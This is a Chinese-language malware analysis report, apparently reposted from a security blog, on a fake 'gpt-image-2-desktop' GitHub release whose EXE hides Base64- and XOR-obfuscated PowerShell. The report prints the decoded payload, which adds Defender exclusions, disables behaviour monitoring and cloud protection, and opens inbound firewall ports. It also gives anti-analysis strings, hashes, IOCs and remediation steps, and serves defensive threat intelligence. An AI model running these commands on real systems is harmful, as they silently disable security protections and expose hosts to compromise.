文章总结: 该报告分析了一个名为gpt-image-2-desktop的GitHub仓库,其Release二进制被判定为高度恶意投毒样本。仓库源码与宣传严重不符,实际为TensorFlowPython代码而非桌面应用。Release中的EXE文件未签名,内嵌隐藏PowerShell脚本,用于修改WindowsDefender配置、添加排除项、关闭安全功能并开放防火墙端口。仓库目前已不可公开访问。建议立即删除下载文件,若已运行则按失陷主机处理,并恢复安全配置。 综合评分: 100 文章分类: 恶意软件,应急响应,威胁情报
gpt-image-2-desktop 投毒分析报告
z00000 z00000
安全光圈
2026年7月10日 18:00 中国台湾
在小说阅读器读本章
去阅读
gpt-image-2-desktop 投毒分析报告
分析时间:2026-07-10
分析对象:https://github.com/desktop-gpt-image-2/gpt-image-2-desktop
结论:该项目 Release 二进制高度恶意,应按投毒样本处理,不应运行。
结论摘要
该仓库 README 宣称提供 “GPT Image 2 Desktop” 桌面应用、签名安装包、零遥测和 OpenAI gpt-image-2 客户端能力。但实际源码与声明严重不一致:仓库源码只包含少量旧 TensorFlow/Python 图像模型代码,不是桌面应用。
此前从 Release 下载到的 Windows 样本 gpt-image-2_x64.7z 解压后只有一个 gpt-image-2_x64.exe。该 EXE 未签名,内嵌隐藏 PowerShell,使用 -WindowStyleHidden 和 -ExecutionPolicyBypass 执行混淆脚本。脚本解混淆后明确修改 Windows Defender 配置、添加排除项、关闭云查杀/行为监控/PUA 检测,并开放入站防火墙端口。这些行为足以判定为恶意或极高风险投毒。
当前文件状态
用户要求将临时分析文件移动到:
/Users/xxxxx/Documents/work/virus_analysis/gpt-image-2-desktop投毒分析
执行移动时,原 /tmp 中样本文件已经不存在或只剩空目录骨架。当前目录下保留的目录:
- •
gpt-image-2-desktop-audit/:首次移动过来的源码快照目录,但当前只剩目录骨架,没有普通文件。 - •
gpt-image-2-release/:首次移动过来的 Release 解压目录,但当前为空。
尝试重新获取样本时,原 GitHub 下载链接返回 404,GitHub API 查询仓库/Release 返回 Not Found,重新 git clone 返回认证失败。判断该仓库当前已不可公开访问,可能已被删除、转私有或封禁。
因此,本报告中的 EXE 静态证据来自此前同一会话中已完成的分析记录;当前磁盘上未能保留原始 EXE/7z 实体。
样本信息
此前观察到的 Release 资产:
- • Release 文件名:
gpt-image-2_x64.7z - • Release 文件大小:约 85,341,476 bytes
- • Release 上传时间:2026-06-30 11:52:19 UTC
- • Release API digest:
sha256:c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29
此前本地下载并解压后观察到:
- • 压缩包 SHA-256:
c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29 - • 解压文件:
gpt-image-2_x64.exe - • EXE SHA-256:
e27f1bc0d5e62dc401a3482f5b2c72697bb694f6d7cf1f45ca705a13cb8a0ce9 - • 文件类型:
PE32+ executable (GUI) x86-64, for MS Windows - • EXE 大小:约 92 MB
- • 代码签名:未签名
仓库异常点
- • README 宣称是 Windows/macOS 原生桌面应用,但仓库源码只有
src/run.py、src/model.py、src/utils.py等 TensorFlow 1.x Python 文件。 - • 无 Electron/Tauri/Swift/.NET/installer 构建配置。
- • 无
package.json、锁文件、CI 构建脚本或可复现 Release 构建流程。 - • README 提到签名安装器、公证、SHA-256 校验等,但 Release 中实际只有一个 Windows 7z 包。
- • 仓库创建和提交集中在 2026-06-11 十分钟内完成,Release 二进制在 2026-06-30 后续上传。
此前记录到的提交时间线:
dbe34209f88d 2026-06-11T11:06:12Z gpt-image-2-desktop
809163bb727f 2026-06-11T11:02:00Z gpt-image-2-desktop
b98d56bef776 2026-06-11T11:01:48Z Delete src directory
18fdf18a4dba 2026-06-11T11:01:43Z Delete assets directory
84b501747643 2026-06-11T11:01:25Z pt-image-2-desktop
7384f4551c11 2026-06-11T11:01:03Z desktop-gpt-image-2
b1b603829dd0 2026-06-11T10:57:40Z Initial commit
关键静态证据
EXE 字符串中出现与宣传不一致的内容:
DRIVER UPDATE UTILITY - TECHNICAL DOCUMENTATION
This utility automatically checks for and installs hardware driver updates.
Disable antivirus temporarily if needed
Optimized download process for faster updates
EXE 字符串中出现隐藏 PowerShell 调用:
powershell.exe -NoProfile -NonInteractive -WindowStyleHidden -ExecutionPolicyBypass -Command ...
混淆方式:
- • 变量
$uowuunxT保存 Base64 字符串。 - •
[System.Convert]::FromBase64String($uowuunxT)解码。 - • 每个字节与
44做 XOR。 - • 生成的脚本随后执行。
解混淆后的 PowerShell 关键行为:
Add-MpPreference -ExclusionPath 'C:\Users'
Add-MpPreference -ExclusionPath "$env:TEMP"
Add-MpPreference -ExclusionPath 'C:\ProgramData'
Add-MpPreference -ExclusionPath 'C:\OneDriveTemp'
Add-MpPreference -ExclusionPath 'C:\Users\Public'
Add-MpPreference -ExclusionPath 'C:\Windows'
Add-MpPreference -ExclusionProcess 'powershell.exe'
Add-MpPreference -ExclusionProcess 'pwsh.exe'
Set-MpPreference -MAPSReporting 0
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -CloudBlockLevel 0
Set-MpPreference -PUAProtection disable
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableBehaviorMonitoring $true
New-NetFirewallRule -DisplayName 'Port 57001 TCP' -Direction Inbound -LocalPort 57001 -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -DisplayName 'Port 57002 TCP' -Direction Inbound -LocalPort 57002 -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -DisplayName 'Port 56001 TCP' -Direction Inbound -LocalPort 56001 -Protocol TCP -Action Allow -Enabled True
以上行为不是正常桌面图像生成客户端所需行为,属于典型防护绕过和环境放行。
其他可疑字符串
此前静态字符串中还观察到:
Failed to fetch conditional payload URL
APPDATA
Ledger Live
runas
--elevated
malware
virus
sandbox
cuckoo
SbieDll.dll
ollydbg.exe
x32dbg.exe
x64dbg.exe
windbg.exe
ida.exe
ida64.exe
processhacker.exe
procexp.exe
wireshark.exe
fiddler.exe
charles.exe
vmtoolsd.exe
vboxservice.exe
VirtualBox
Google Compute Engine
Virtual Machine
这些字符串提示样本可能包含条件载荷、提权/重试逻辑、钱包相关路径或反沙箱/反调试判断。由于未进行动态分析,以上作为辅助可疑迹象,不作为唯一判定依据。
导入表可疑点
此前 objdump -p 观察到导入项包括:
CreateProcessW
CreateThread
CreateMutexA
CreateToolhelp32Snapshot
Process32First
Process32Next
ShellExecuteW
RegOpenKeyExW
RegQueryValueExW
connect
send
recv
WSASend
VirtualProtect
这些 API 单独出现不必然恶意,但与隐藏 PowerShell、Defender 绕过、反分析字符串组合后,风险显著升高。
IOC
文件哈希:
gpt-image-2_x64.7z
c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29
gpt-image-2_x64.exe
e27f1bc0d5e62dc401a3482f5b2c72697bb694f6d7cf1f45ca705a13cb8a0ce9
可疑防火墙端口:
57001/tcp
57002/tcp
56001/tcp
可疑 Defender 配置:
ExclusionPath: C:\Users
ExclusionPath: %TEMP%
ExclusionPath: C:\ProgramData
ExclusionPath: C:\OneDriveTemp
ExclusionPath: C:\Users\Public
ExclusionPath: C:\Windows
ExclusionProcess: powershell.exe
ExclusionProcess: pwsh.exe
MAPSReporting: 0
SubmitSamplesConsent: NeverSend
CloudBlockLevel: 0
PUAProtection: disable
DisableIOAVProtection: true
DisableBehaviorMonitoring: true
DisableBlockAtFirstSeen: true
处置建议
如果只是下载但未运行:
- • 删除
gpt-image-2_x64.7z和gpt-image-2_x64.exe。 - • 不要从该仓库或镜像站下载任何 Release 资产。
如果已经在 Windows 上运行:
-
• 立即断网。
-
• 按已失陷主机处理。
-
• 检查并恢复 Windows Defender 配置:
-
• Defender 排除路径
-
• Defender 排除进程
-
• 云查杀/MAPS/样本提交/PUA/行为监控配置
-
• 检查并删除异常防火墙入站规则:
-
•
Port 57001 TCP -
•
Port 57002 TCP -
•
Port 56001 TCP -
• 检查启动项、计划任务、服务、
C:\ProgramData、%TEMP%、C:\Users\Public、用户 AppData。 -
• 轮换该主机上使用过的密码、API Key、浏览器会话、钱包相关凭据。
-
• 如果运行时授予过管理员权限,建议重装系统并从可信备份恢复数据。
分析限制
- • 未执行样本,未做动态沙箱分析。
- • 当前 GitHub 仓库和 Release 已不可公开访问,无法重新下载样本复核。
- • 当前磁盘目录未能保留原始 EXE/7z 文件;本报告基于此前同一会话中已记录的静态分析输出。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全光圈 z00000 z00000《gpt-image-2-desktop 投毒分析报告》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论